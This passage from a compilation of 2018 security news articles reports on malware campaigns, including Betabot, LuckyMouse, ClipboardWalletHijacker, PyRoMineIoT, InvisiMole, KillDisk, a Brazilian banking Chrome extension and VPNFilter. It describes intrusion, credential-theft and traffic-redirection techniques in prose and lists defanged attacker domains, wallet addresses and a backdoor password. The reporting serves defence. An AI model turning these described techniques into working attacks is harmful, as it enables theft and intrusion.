The 2nd.bat script starts the main exe file and kills the Word process, then deletes the Resiliency directory from registry to hide its tracks and prevent recovery of the document. The script also deletes other tracks of presence. Decoy.doc is displayed to the user after infection.

At the time of execution, the threat was observed connecting to hxxp://goog[.]com/newbuild/t.php?stats=send&thread=0, security researcher Wojciech reveals.

Written in C#, the exe.exe file shows multiple layers of obfuscation, the first being the DeepSea algorithm, followed by simple XOR and Modulo operations. Deobfuscation reveals a new file with many embedded images in its resources. These are used in the next stage.

Next, the researcher found a .Net file featuring encrypted strings. This layer is meant to decrypt another file and store it in dictionary with other information related to malware configuration. For that, it retrieves said images from resources, changes them into memory stream, decrypts them, and adds them to dictionary.

During execution, the threat also checks for the configuration from dictionary and calls the appropriate function. These functions allow it to, among others, check if it runs in a virtual environment and copy itself to the start menu.

At the last stage of the attack, a new variant of Betabot is deployed. The sample contains some anti-debugging and anti-virtualization tricks, then initiates communication with a domain, likely for tracking purposes. The researcher also noticed some redirections using said tracking values, likely meant to earn some additional money from an affiliate program.

The malware also communicates with a command and control (C&C) server at onedriveservice[.]com, which is clearly not a genuine Microsoft domain.

Compromised GitHub Account Spreads Malicious Syscoin Installers
18.6.18 securityweek 

Malware-laden Syscoin releases were up for download on an official GitHub repository after hackers managed to compromise an account and replace legitimate Windows installers.

The malicious releases were posted on the Syscoin GitHub release page on June 9 and remained there until June 13. Only the Windows Syscoin installers (syscoincore-3.0.4-win32-setup.exe and syscoincore-3.0.4-win64-setup.exe) were affected.

In a security notice published on Syscoin’s official account on the soon-to-be Microsoft owned GitHub, the developers explain that the malicious code included in the modified installers is detected as Trojan:Win32/Feury.B!cl.

Mac and Linux releases were not modified by the hackers. Windows users who downloaded the ZIP files weren’t affected either (all users who did not download or execute the Syscoin setup binaries are safe).

“This may affect Windows users who downloaded and executed the Syscoin Windows setup binaries from Github between June 09th, 18 10:14 PM UTC & June 13th, 18 10:23 PM UTC,” the security notice reads.

“Please be aware this exploit method could potentially affect other blockchain projects on Github,” Blockchain Foundry notes in the Syscoin 3.0.5’s release announcement.

Windows users are advised to check the installation date for their Syscoin and make sure they did not download and execute releases containing the malicious code.

If the modified/installation date is between June 9, 18, and June 13, 18, users are advised to back up important data (including wallets) and make sure it does not contain infectious code, then scan their system with an anti-virus application.

They should also change passwords entered in the timeframe (the malware is a keylogger), secure any funds stored in “unencrypted wallets or wallets that had been unlocked during the infection period.”

Windows users who downloaded the corrupted binaries are also advised to run a GenericKD Trojan removal guide before restarting the system, as the Trojan might log entered passwords.

The hack was discovered after the Blockchain Foundry team received reports that the syscoincore-3.0.4-win64-setup.exe binary was being flagged as a potential virus by Windows Defender SmartScreen, AVG, and Kaspersky.

“Investigation into the issue revealed the original Github Windows setup binaries for release had been modified and replaced with a malicious version through a compromised Github account. Upon discovery, the setup binaries were removed from Github and replaced with official, signed versions of the binaries,” Syscoin reveals.

The malicious binaries were immediately removed from the repository and replaced with the legitimate ones. To prevent similar incidents, Syscoin developers and Blockchain Foundry staff with Github access are now required to have 2-step authentication enabled, to routinely check signature hashes, and to “work with Github to ensure users will be able to detect if binaries have been altered after release.”

“Although the issue was detected quickly, we believe that the crypto-community is at risk for a specific type of attack which targets gatekeepers of source code for cryptocurrency projects. We highly recommend that all gatekeepers of software repositories for cryptocurrency projects sign binaries through an official build process like Gitian,” Syscoin notes.

LuckyMouse hits national data center to organize country-level waterholing campaign
17.6.18 Kaspersky  APT 
In March 18 we detected an ongoing campaign targeting a national data center in the Central Asia that we believe has been active since autumn 2017. The choice of target made this campaign especially significant – it meant the attackers gained access to a wide range of government resources at one fell swoop. We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks.

The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 18. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression.

Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. A full technical report, IoCs and YARA rules are available from our intelligence reporting service (contact us intelligence@kaspersky.com).

Who’s behind it?
Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. The tools found in this campaign, such as the HyperBro Trojan, are regularly used by a variety of Chinese-speaking actors. Regarding Metasploit’s shikata_ga_nai encoder – although it’s available for everyone and couldn’t be the basis for attribution, we know this encoder has been used by LuckyMouse previously.

Government entities, including the Central Asian ones also were a target for this actor before. Due to LuckyMouse’s ongoing waterholing of government websites and the corresponding dates, we suspect that one of the aims of this campaign is to access web pages via the data center and inject JavaScripts into them.

How did the malware spread?
The initial infection vector used in the attack against the data center is unclear. Even when we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can´t prove they were related to this particular attack. It’s possible the actor used a waterhole to infect data center employees.

The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board. We suspect this router was hacked as part of the campaign in order to process the malware’s HTTP requests. The Sonypsps[.]com domain was last updated using GoDaddy on 2017-05-05 until 2019-03-13.

FMikrotik router with two-year-old firmware and SMBv1 on board used in this campaign

In March 2017, Wikileaks published details about an exploit affecting Mikrotik called ChimayRed. According to the documentation, however, it doesn’t work for firmware versions higher than 6.30. This router uses version 6.34.

There were traces of HyperBro in the infected data center from mid-November 2017. Shortly after that different users in the country started being redirected to the malicious domain update.iaacstudio[.]com as a result of the waterholing of government websites. These events suggest that the data center infected with HyperBro and the waterholing campaign are connected.

What did the malware do in the data center?

Anti-detection stages. Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red)

The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db). As a result of all these steps, the last-stage Trojan is injected into svchost.exe’s process memory.

The launcher module, obfuscated with the notorious Metasploit’s shikata_ga_nai encoder, is the same for all the droppers. The resulting deobfuscated code performs typical side loading: it patches pcAnywhere’s image in memory at its entry point. The patched code jumps back to the decryptor’s second shikata_ga_nai iteration, but this time as part of the whitelisted application.

This Metasploit’s encoder obfuscates the last part of the launcher’s code, which in turn resolves the necessary API and maps thumb.db into the same process’s (pcAnywhere) memory. The first instructions in the mapped thumb.db are for a new shikata_ga_nai iteration. The decrypted code resolves the necessary API functions, decompresses the embedded PE file with RtlCompressBuffer() using LZNT1 and maps it into memory.

What does the resulting watering hole look like?
The websites were compromised to redirect visitors to instances of both ScanBox and BEeF. These redirects were implemented by adding two malicious scripts obfuscated by a tool similar to the Dean Edwards packer.

Resulting script on the compromised government websites

Users were redirected to https://google-updata[.]tk:443/hook.js, a BEeF instance, and https://windows-updata[.]tk:443/scanv1.8/i/?1, an empty ScanBox instance that answered a small piece of JavaScript code.

LuckyMouse appears to have been very active recently. The TTPs for this campaign are quite common for Chinese-speaking actors, where they typically provide new solid wrappers (launcher and decompressor protected with shikata_ga_nai in this case) around their RATs (HyperBro).

The most unusual and interesting point here is the target. A national data center is a valuable source of data that can also be abused to compromise official websites. Another interesting point is the Mikrotik router, which we believe was hacked specifically for the campaign. The reasons for this are not very clear: typically, Chinese-speaking actors don’t bother disguising their campaigns. Maybe these are the first steps in a new stealthier approach.

Some indicators of compromise



HyperBro in-memory Trojan

Domains and IPs

ClipboardWalletHijacker miner hijacks your Ether and Bitcoin transaction, over 300,000 computers have been infected
17.6.18 securityaffairs

Researchers uncovered a new malware campaign spreading a clipboard hijacker dubbed ClipboardWalletHijacker that has already infected over 300,000 computers.
Security researchers from Qihoo 360 Total Security have spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that has already infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

“Recently, 360 Security Center discovered a new type of actively spreading CryptoMiner, ClipboardWalletHijacker. The Trojan monitors clipboard activity to detect if it contains the account address of Bitcoin and Ethereum.” reads the analysis published by the company.

“It tampers with the receiving address to its own address to redirect the cryptocurrency to its own wallet. This kind of Trojans has been detected on more than 300 thousand computers within a week.”

Modus operandi for ClipboardWalletHijacker is not a novelty, the malware is able to monitor the Windows clipboard looking for Bitcoin and Ethereum addresses and replace them with the address managed by the malware’s authors.

In March 18, researchers at Palo Alto Networks discovered a malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address and alter clipboards to steal cryptocurrencies and payments.

In a similar way, ClipboardWalletHijacker aims at hijacking BTC and ETH transactions.

Experts observed the malware using the following addresses when replacing legitimate ones detected in users’ clipboards:

BTC: 1FoSfmjZJFqFSsD2cGXuccM9QMMa28Wrn1
BTC: 19gdjoWaE8i9XPbWoDbixev99MvvXUSNZL
ETH: 0x004D3416DA40338fAf9E772388A93fAF5059bFd5
below the function the replace the legitimate Ethereum wallet address with the attackers’ one:
By replacing the address with the following one: “0x004D3416DA40338fAf9E772388A93fAF5059bFd5” the hackers have successfully hijacked 46 transactions.

Below the balances of these addresses:

Hackers have stolen a total 0.12434321 BTC from eight transactions and no Ether, for a total of around $800.

Recently Qihoo discovered many other miners, such as TaksHostMiner and WagonlitSwfMiner that infected dozens of thousands of machines.

“Recently, we have found that a lot of CryptoMiner Trojans are using this technique to steal victims’ cryptocurrencies.” concludes the company. “We strongly recommend users to enable antivirus software while installing new applications. Users are also recommended to run virus scan with 360 Total Security to avoid falling victim to CryptoMiner.”

PyRoMineIoT spreads via EternalRomance exploit and targets targets IoT devices in Iran and Saudi Arabia.
13.6.18 securityaffairs

Fortinet discovered PyRoMineIoT, a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance exploit to spread.
PyRoMineIoT is a new strain of crypto-currency miner that exploits the NSA-linked EternalRomance remote code execution exploit to spread, the malware also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

PyRoMineIoT is quite similar to another crypto-currency miner dubbed PyRoMine that was first spotted a few weeks ago, its infections rapidly increased since April, most of them in Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

According to Fortinet, the older miner was improved with some obfuscation, the latest variant PyRoMine is hosted on the same IP address 212[.]83.190[.]122, and both variants leverage the EternalRomance implementation found on the Exploit Database website.

PyRoMineIoT is delivered from a website disguised as security updates for web browsers.

Once the PyRoMineIoT malware has compromised a device, it will download an obfuscated VBScript that has the same functionality as the one used by the PyRoMine variant, but its code appears well organized.

The VBScript also downloads other components, including a Monero miner (XMRig), but differently from previous variant it uses ransom names for the files.

“As with the previous version of PyRoMine, this new version is hosted on the same IP address The downloaded file is an executable compiled with PyInstaller, which is a program that packages programs written in Python into stand-alone executables. This means that there is no need to install Python on the machine in order to execute the Python program.” reads the analysis published by Fortinet.

Both variants sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” then it enables RDP and adds a firewall rule to allow traffic on port 3389.

Once compromised a device, PyRoMineIoT attempts to remove PyRoMine variant if present.

The analysis of one of the pool addresses used by the threat actors behind the malware revealed it earned around 5 Monero (about $850).

The victim downloads a fake update as .zip archives containing a downloader written in C# that fetches the miner file, a Python-based malware that leverages EternalRomance to spread the downloader, and other malicious components.

“One of the downloaded components is a Python-based malware that takes advantage of the NSA exploit ETERNALROMANCE to spread the agent to vulnerable machines in the network. Another component is a tool that steals user credentials from Chrome browser named ChromePass.” continues the analysis.

“Another component scans for vulnerable IoT devices in Iran and Saudi Arabia that use the login credentials “admin” for username and password.”


The EternalRomance implementation collects the IPs of local subnets and targets them to spread using credentials with username ‘aa’ and an empty password.

Another component used by the malware is the legitimate software ChromePass that allows seeing credentials from Chrome.

Once the credentials are collected by the malware, it saves them in XML format and uploads the file to an account on DriveHQ’s cloud storage service.

PyRoMineIoT searches for vulnerable IoT devices, but at the time it only targets those in Iran and Saudi Arabia.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem.” Fortinet concludes.

“We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,”

New 'PyRoMineIoT' Malware Spreads via NSA-Linked Exploit
12.6.18 securityweek 

A recently discovered piece of crypto-currency miner malware isn’t only abusing a National Security Agency-linked remote code execution exploit to spread, but also abuses infected machines to scan for vulnerable Internet of Things (IoT) devices.

Dubbed PyRoMineIoT, the malware is similar to the PyRoMine crypto-currency miner that was detailed in late April. Both mine for Monero, both are Python-based, and both use the EternalRomance exploit for propagation purposes (the vulnerability was patched in April last year).

The older threat, Fortinet’s Jasper Manuel reveals, has received an update to add some obfuscation, likely in an attempt to evade detection from anti-virus programs.

The latest PyRoMine variant is hosted on the same IP address 212[.]83.190[.]122, was compiled with PyInstaller into a stand-alone executable, and continues to use the EternalRomance implementation found on the Exploit Database website, the same as the initially analyzed variant.

After a successful exploitation, an obfuscated VBScript is downloaded. The VBScript has the same functionality as the previously used one, but features more organized code and also adds a version number.

The same as before, it sets up a Default account with the password P@ssw0rdf0rme and adds the account to the local groups “Administrators,” “Remote Desktop Users,” and “Users,” after which it enables RDP and adds a firewall rule to allow traffic on port 3389.

The VBScript also downloads other components, including a Monero miner (XMRig), but now uses randomly generated names for these files. The malware attempts to remove older versions of PyRoMine from the system.

One of the pool addresses used by the malware suggests the actors made around 5 Monero (about $850) from their nefarious activities. The malware has infected a large number of systems since April, with the top 5 affected countries being Singapore, India, Taiwan, Côte d’Ivoire, and Australia.

The newly discovered PyRoMineIoT, Manuel says, is similar to PyRoMine, hence the similar naming. The threat is served from “an obviously malicious looking website,” disguised as security updates for web browsers.

The fake updates are downloaded as .zip archives that contain a downloader agent written in C#. This agent fetches the miner file and other malicious components, including a Python-based malware that leverages EternalRomance to spread the downloader to vulnerable machines in the network.

The agent also fetches a component to steal user credentials from Chrome, and another to scan for IoT devices in Iran and Saudi Arabia that use the admin: admin username and password pair.

The EternalRomance implementation uses the same code base as PyRoMine and works in a similar manner, collecting the IPs of local subnets and iterating through them to execute the payload. It uses the username ‘aa’ with an empty password.

The second component is part of the legitimate ChromePass tool that allows users to recover passwords from the Chrome browser. As part of these attacks, it is abused to steal credentials from unsuspecting users: the tool saves the recovered credentials in XML format and uploads the file to an account on DriveHQ’s cloud storage service (the account has been already disabled).

The most interesting aspect of this malware, however, is its ability to search for vulnerable IoT devices, but it only targets those in Iran and Saudi Arabia for that. The threat sends the IP information of discovered devices to the attacker’s server, supposedly in preparation for further attacks.

The same as PyRoMine, the malware downloads the XMRig miner on the compromised system. After checking one of the pool addresses used by the threat, however, the researcher discovered that it hasn’t generated revenue yet. This, however, isn’t surprising, considering that the malware only started being distributed on June 6, 18, and is an unfinished project.

“This development confirms yet again that malware authors are very interested in cryptocurrency mining, as well as in capturing a chunk of the IoT threat ecosystem. We predict that this trend will not fade away soon, but will continue as long as there are opportunities for the bad guys to easily earn money by targeting vulnerable machines and devices,” Fortinet concludes.

InvisiMole Spyware is a powerful malware that went undetected for at least five years
11.6.18 securityaffairs  

Malware researchers from ESET have spotted a new sophisticated piece of spyware, tracked as InvisiMole, used in targeted attacks in Russia and Ukraine in the last five years.
Experts still haven’t attributed the malware to any threat actor, InvisiMole could be a nation-state malware developed for cyber espionage purpose or the result of a development of a financially-motivated group.

The researchers have discovered only a few dozen samples in the wild, the malicious code implements a broad range of features thanks it modular architecture that make the threat very versatile.

“Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia.” reads the report published by ESET.“The campaign is highly targeted – no wonder the malware has a low infection ratio, with only a few dozen computers being affected.”

At the time the experts still haven’t discovered the attack vector and there is no info about the types of campaigns in which it was involved.

Experts don’t exclude any infection vector, including installation facilitated by physical access to the machine.

The modular structure of the InvisiMole spyware is composed of a wrapper DLL that leverages two other backdoor modules that are embedded in its resources to conduct its activities.

InvisiMole spyware

According to the researchers, the authors of the InvisiMole spyware have removed any clue that could attribute the malware to a specific actor, the unique exception is represented by the compilation data of a single file (dating to October 13, 2013). Compilation dates for all the remaining files have been removed by the authors.

The main module is called RC2FM and supports 15 commands that allow the attacker to search and exfiltrate data from the infected system.

The RC2FM supports commands for gathering system information and performing simple changes on the system, it also includes spyware features like the control of the microphone and user’s webcam.

The second module, dubbed RC2CL, is greater and more advanced than RC2FM, it is able to extract proxy settings from browsers and use those configurations to send data to the C&C server in the presence of a proxy.

“This module communicates with C&C servers that are either hardcoded in the sample, or updated later by the attackers.” continues the analysis.

“Moreover, the module is able to reach out to the C&C servers even if there is a proxy configured on the infected computer. If a direct connection is unsuccessful, the module attempts to connect to any of its C&C servers using locally-configured proxies or proxies configured for various browsers (Firefox, Pale Moon, and Opera).”

The RC2CL module supports 84 backdoor commands and implements almost all the spyware capabilities, including the ability to run remote shell commands, registry key manipulation, file execution, getting a list of local apps, loading drivers, getting network information, disabling UAC, and turning off the Windows firewall.

RC2CL can also record audio via the microphone and take screenshots via the webcam, in the same way the InvisiMole spyware can do with the first module.

The RC2CL module also implements a safe-delete feature to avoid forensic investigation.

“Another example of how the malware authors attempt to act covertly is the way they treat traces left on the disk. The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers.Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack – after the victim becomes aware of it.“continues the report.

“This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted.”

The full list of IoCs related to the threat can be found on GitHub.

Trend Micro spotted a new variant of KillDisk wiper in Latin America
9.6.18 securityaffairs  

In May, experts at Trend Micro observed a new sample of KillDisk in Latin America, the malware infected the systems of a bank.
A new piece of the KillDisk wiper was observed spotted earlier this year targeting financial organizations in Latin America, Trend Micro reports.

The destructive malware was involved in the attacks against Ukraine’s grid in December 2015, the attack was attributed to a Russia-linked APT group tracked as BlackEnergy.

In December 2016, researchers at security firm CyberX discovered a variant of the KillDisk malware that implemented ransomware features.

In May, experts at Trend Micro observed a master boot record (MBR)-wiping malware in Latin America, the malicious code infected the systems of a bank with a severe impact on their operations.

According to the experts, the hacker failed the attack because the real goal was obtaining the access to SWIFT network.

“Last May, we uncovered a master boot record (MBR)-wiping malware in the same region. One of the affected organizations was a bank whose systems were rendered inoperable for several days, thereby disrupting operations for almost a week and limiting services to customers.” reads the analysis published by Trend Micro.

“Our analysis indicates that the attack was used only as a distraction — the end goal was to access the systems connected to the bank’s local SWIFT network.”

The malware researchers determined that the malicious code was a strain of the dreaded Killdisk due to on the error message displayed by the affected systems.


The analysis of the payload makes it difficult to determine the motivation behind the attack.

The experts analyzed a sample of that variant and discovered it was created with Nullsoft Scriptable Install System (NSIS), which is an open-source application used to create setup programs.

The sample was named by the author as “MBR Killer,” the sample included a routine to wipe the first sector of the machine’s physical disk.

The sample was protected by VMProtect, a tool used to prevent reverse engineering of the code in a virtualized environment.

The analysis of the sample did not reveal any connection to a command-and-control (C&C) infrastructure neither the presence of ransomware-like routines.

“We haven’t found any other new or notable routines in the sample we have. There is no evident command-and-control (C&C) infrastructure or communication, or ransomware-like routines coded into the sample. There are no indications of network-related behavior in this malware.” continues the analysis.

The malware wipes all physical hard disks on the infected system, it retrieves the handle of the hard disk and overwrites the first sector of the disk (512 bytes) with “0x00”, then forces the machine to shut down.

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” concludes Trend Micro.

The report also included Indicators of Compromises (IoCs)

New KillDisk Variant Hits Latin America
8.6.18 securityweek 

A new version of the destructive KillDisk malware was observed earlier this year targeting organizations in Latin America, Trend Micro reports.

KillDisk has been around for several years, and was used in attacks targeting Ukraine’s energy sector in 2015, orchestrated by the Russia-linked threat actor BlackEnergy.

Initially designed to wipe hard drives and render systems inoperable, the malware received file-encrypting capabilities in late 2016, with a Linux-targeting variant of the ransomware spotted shortly after.

In January, Trend Micro security researchers observed a new variant of the malware in Latin America, and revealed that the threat was once again deleting files and wiping the disk.

One of the attacks, the security firm reveals, was related to a foiled heist on the organization’s system connected to the SWIFT network (Society for Worldwide Interbank Financial Telecommunication).

In May, the security firm observed a master boot record (MBR)-wiping malware in the region, with one of the impacted organizations being a bank “whose systems were rendered inoperable for several days.” The attack, however, was deemed a distraction, as the actor behind it was in fact focused on accessing systems connected to the bank’s local SWIFT network.

The researchers also discovered that the malware used in this attack was a new variant of KillDisk, based on the error message displayed by the affected systems (common to machines infected with MBR-wiping threats).

“The nature of this payload alone makes it difficult to determine if the attack was motivated by an opportunistic cybercriminal campaign or part of a coordinated attack like the previous attacks we observed last January,” Trend Micro says.

The malware used in the May attack was created using Nullsoft Scriptable Install System (NSIS), with the actor purposely naming it “MBR Killer.” Analysis of the sample revealed a routine to wipe the first sector of the machine’s physical disk.

The security researchers also say they haven’t found other new or notable routines in the sample and that no command-and-control (C&C) infrastructure or communication were observed. Furthermore, no ransomware-like routines were found in the malware, nor network-related behavior.

The threat can wipe all of the physical hard disks on the infected system. To wipe the MBR, it retrieves the handle of the hard disk, overwrites the first sector of the disk (512 bytes) with “0x00”, attempts the same routine on all hard disks, then forces the machine to shut down.

“The destructive capabilities of this malware, which can render the affected machine inoperable, underscore the significance of defense in depth: arraying security to cover each layer of the organization’s IT infrastructure, from gateways and endpoints to networks and servers,” Trend Micro notes.

A MitM extension for Chrome
8.6.18 Kaspersky
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.

The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.

Geographic distribution of security product detections of the script fundo.js, one of the extension components

By the time of publication, the malicious extension had already been removed from Chrome Web Store.

The malicious extension in Chrome Web Store

Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.

The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.

The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha18[.]tk:18) and saved to chrome.storage under the key ‘manualRemovalStorage’.

Download of data from C&C via a WebSocket connection

Data downloaded and saved by the extension

As a result of contacting hxxp://exalpha18[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.

IP address received from C&C server

The IP to which all user traffic is then redirected

It’s worth mentioning here the Proxy Auto Configuration technology. Modern browsers use a special file written in JavaScript which has just one function: FindProxyForURL. With this function, the browser defines which proxy server to use to establish a connection to various domains.

The fundo.js script uses the Proxy Auto Configuration technology at the time of the function call implement_pac_script. This results in the function FindProxyForURL being replaced with a new one that redirects user traffic to the malicious server, but only when a user visits the web page of a Brazilian bank.

Changing browser settings to redirect user traffic

In this script, the following section of code is the most important:

Execution of the downloaded malicious code on web pages belonging to banks

Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.

pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:


Web Antivirus detection statistics for attempts to contact ganalytics[.]ga

All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.

One of this script’s functions is to add specific HTML code to the main page of the online banking system.

Addition of malicious code to the web page

A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.

Interception of users’ one-time passwords

If a user is on the page where logins and passwords are entered, the script creates a clone of the ‘Enter’ button. A function is also created to click this button. The password is stored in the cookie files of this function for subsequent transfer to the C&C and the real button, which is overlaid and hidden from the victim, is then clicked.

Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted

As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.

Sending of all intercepted data to the C&C

Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:

WHOIS info for ganalytics[.]ga

However, the IP address where it’s hosted is also associated with several other interesting domains.

A fragment of DNS data from KSN

It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.

Fragments of KSN data related to advstatistics.com[.]br

When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other things about this case, namely the fact that it targeted Brazilian users and that it used the same IP address that was used in previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to add cryptocurrency mining scripts to the banking sites users were visiting at the moment the extension was downloaded to their devices.

Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.

Destructive and MiTM Capabilities of VPNFilter Malware Revealed
8.6.18 thehackernews 

It turns out that the threat of the massive VPNFilter botnet malware that was discovered late last month is beyond what we initially thought.
Security researchers from Cisco's Talos cyber intelligence have today uncovered more details about VPNFilter malware, an advanced piece of IoT botnet malware that infected more than 500,000 routers in at least 54 countries, allowing attackers to spy on users, as well as conduct destructive cyber operations.
Initially, it was believed that the malware targets routers and network-attached storage from Linksys, MikroTik, NETGEAR, and TP-Link, but a more in-depth analysis conducted by researchers reveals that the VPNFilter also hacks devices manufactured by ASUS, D-Link, Huawei, Ubiquiti, QNAP, UPVEL, and ZTE.

"First, we have determined that are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Lin," the researchers say.
To hijack devices manufactured by above listed affected vendors, the malware simply relies on publicly-known vulnerabilities or use default credentials, instead of exploiting zero-day vulnerabilities.
VPNFilter 'ssler' — Man-in-the-Middle Attack Module

Besides this, the researchers primarily shared technical details on a new stage 3 module, named "ssler," which is an advanced network packet sniffer that, if installed, allows hackers to intercept network traffic passing through an infected router and deliver malicious payloads using man-in-the-middle attacks.
"Ssler module provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80," the researchers say.
This 3rd-stage module also makes the malware capable of maintaining a persistent presence on an infected device, even after a reboot.
The ssler module has been designed to deliver custom malicious payloads for specific devices connected to the infected network using a parameter list, which defines the module's behavior and which websites should be targeted.
These parameters include settings to define the location of a folder on the device where stolen data should be stored, the source and destination IP address for creating iptable rules, as well as the targeted URL of the JavaScript injection.

To setup packet sniffing for all outgoing web requests on port 80, the module configures the device's iptables immediately after its installation to redirect all network traffic destined for port 80 to its local service listening on port 8888.
"To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes," the researchers explain.
To target HTTPS requests, the ssler module also performs SSLStrip attack, i.e., it downgrades HTTPS connections to HTTP, forcing victim web browsers into communicating over plaintext HTTP.
VPNFilter 'dstr' — Device Destruction Module
As briefed in our previous article, VPNFilter also has a destructive capability (dstr module) that can be used to render an infected device unusable by deleting files necessary for normal device operation.
The malware triggers a killswitch for routers, where it first deliberately kills itself, before deleting the rest of the files on the system [named vpnfilter, security, and tor], possibly in an attempt to hide its presence during the forensic analysis.
This capability can be triggered on individual victim machines or en masse, potentially cutting off internet access for hundreds of thousands of victims worldwide.
Simply Rebooting Your Router is Not Enough
Despite the FBI seizure of a key command and control server right after the discovery of VPNFilter, the botnet still remains active, due to its versatile, multi-stage design.
Stage 1 of the malware can survive a reboot, gaining a persistent foothold on the infected device and enabling the deployment of stages 2 and 3 malware. So, each time an infected device is restarted, stages 2 and 3 are re-installed on the device.

This means, even after the FBI seized the key C&C server of VPNFilter, hundreds of thousands of devices already infected with the malware, likely remain infected with stage 1, which later installs stages 2 and 3.
Therefore, rebooting alone is not enough to completely remove the VPNFilter malware from infected devices, and owners of consumer-grade routers, switches, and network-attached storage devices need to take additional measures, which vary from model to model. For this, router owners are advised to contact their manufacturer.
For some devices, resetting routers to factory default could remove the potentially destructive malware, along with removing stage 1, while some devices can be cleaned up with a simple reboot, followed by updating the device firmware.
And as I said earlier, mark these words again: if your router cannot be updated, throw it away and buy a new one. Your security and privacy is more than worth a router's price.

Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.18 thehackernews  IoT 

After the discovery of massive VPNFilter malware botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a wide number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques including use of exploits, password brute-forcing and abusing weak configurations.
